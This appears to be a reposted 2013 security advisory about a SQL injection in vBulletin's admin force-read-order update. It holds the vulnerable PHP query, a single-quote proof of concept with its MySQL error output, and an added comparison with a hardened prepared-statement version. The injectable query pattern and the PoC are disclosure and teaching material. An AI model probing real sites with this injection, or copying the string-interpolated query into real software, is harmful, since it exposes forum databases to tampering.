order' Parameter SQL Injection Vulnerability

Published: 2013-07-24
Updated: 2013-07-27

Affected systems:
VBulletin VBulletin 4.0.x
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 61449

vBulletin is a powerful, flexible forum software suite that can be fully customized to your own needs.

VBulletin 4.0.x does not properly filter the 'update_order' variable and uses it directly in an SQL statement. This is an SQL injection vulnerability; successful exploitation allows an attacker to perform unauthorized database operations.

<*Source: n3tw0rk
  *>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

The exploit is caused by a variable named 'update_order' not being
sanitized before being used within an insert into statement.

if ($_REQUEST['do'] == 'update_order')
{
    // TYPE_ARRAY only ensures an array is returned; the keys and values
    // themselves are not cleaned here.
    $vbulletin->input->clean_array_gpc('r', array(
        'force_read_order' => TYPE_ARRAY
    ));

    if ($vbulletin->GPC['force_read_order'])
    {
        foreach ($vbulletin->GPC['force_read_order'] AS $threadid => $order)
        {
            // Both $order (array value) and $threadid (array key) are
            // interpolated straight into the query string.
            $db->query_write("
                UPDATE " . TABLE_PREFIX . "thread AS thread
                SET force_read_order = '$order'
                WHERE threadid = '$threadid'
            ");
        }
    }
}
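The following is an added example, not vBulletin's own code and not the vendor's fix (none had been published at the time of the advisory). It places the advisory's string-interpolated UPDATE beside a hardened version that validates both the thread id and the order value as unsigned integers and binds them through a PDO prepared statement. The table name, the two sample rows and the request array are constructed; an in-memory SQLite database stands in for MySQL so the script runs offline, and SQLite rejects the broken statement just as MySQL does in the PoC output below.

```php
<?php
// Added example (not vBulletin's code): vulnerable vs. hardened update loop.
// Uses PDO with an in-memory SQLite database; table, rows and input are constructed.

function openDemoDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE thread (threadid INTEGER PRIMARY KEY, force_read_order INTEGER)");
    $db->exec("INSERT INTO thread (threadid, force_read_order) VALUES (5161, 0), (5162, 0)");
    return $db;
}

// Vulnerable form: mirrors the advisory's query. Both the array key ($threadid)
// and the value ($order) come straight from the request and are spliced into SQL.
function updateOrderVulnerable(PDO $db, array $forceReadOrder): array {
    $results = [];
    foreach ($forceReadOrder as $threadid => $order) {
        $sql = "UPDATE thread SET force_read_order = '$order' WHERE threadid = '$threadid'";
        try {
            $db->exec($sql);
            $results[$threadid] = 'ok';
        } catch (PDOException $e) {
            // A stray quote in $order unbalances the statement, as in the PoC.
            $results[$threadid] = 'sql error: ' . $e->getMessage();
        }
    }
    return $results;
}

// Hardened form (assumed fix for illustration): both columns hold integers, so
// reject anything that is not a plain unsigned number, then bind the values
// through a prepared statement so input can never change the query text.
function updateOrderHardened(PDO $db, array $forceReadOrder): array {
    $stmt = $db->prepare("UPDATE thread SET force_read_order = :ord WHERE threadid = :tid");
    $results = [];
    foreach ($forceReadOrder as $threadid => $order) {
        if (!preg_match('/^\d+$/', (string)$threadid) || !preg_match('/^\d+$/', (string)$order)) {
            $results[$threadid] = 'rejected';
            continue;
        }
        $stmt->execute([':ord' => (int)$order, ':tid' => (int)$threadid]);
        $results[$threadid] = 'ok';
    }
    return $results;
}

// Constructed request input: the second entry carries the quote used in the PoC.
$input = [5161 => '1', 5162 => "1'"];
print_r(updateOrderVulnerable(openDemoDb(), $input));
print_r(updateOrderHardened(openDemoDb(), $input));
```

Run with `php example.php` (the pdo_sqlite extension is required). The vulnerable function reports a syntax error for thread 5162 because the quote terminates the string literal early, while the hardened function refuses that value before any SQL is built and updates thread 5161 through the bound parameters. The integer check is deliberate rather than escaping alone: the array key is also attacker-controlled, and treating both fields as integers removes any string context from the query.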
POC
You will need Admincp access, then go to
site.com/admincp/force_read_thread.php; then, in the force read order column,
put a ' into one of them to show this:
Database error in vBulletin 4.2.1:

Invalid SQL:

UPDATE thread AS thread
SET force_read_order = '1''
WHERE threadid = '5161';

MySQL Error  : You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'5161'' at line 2
Error Number  : 1064
Request Date  : Thursday, July 25th 2013 @ 01:20:52 AM
Error Date    : Thursday, July 25th 2013 @ 01:20:52 AM
Script        :
?do=update_order
Referrer      :
IP Address    :
Username      : n3tw0rk
Classname    :
MySQL Version :

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

VBulletin
---------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:


Content copyright notice: unless otherwise stated, all articles are original to this site.

When reprinting, cite the source: http://www.heiqu.com/2e83774ef0beed1128cb2574589e32f1.html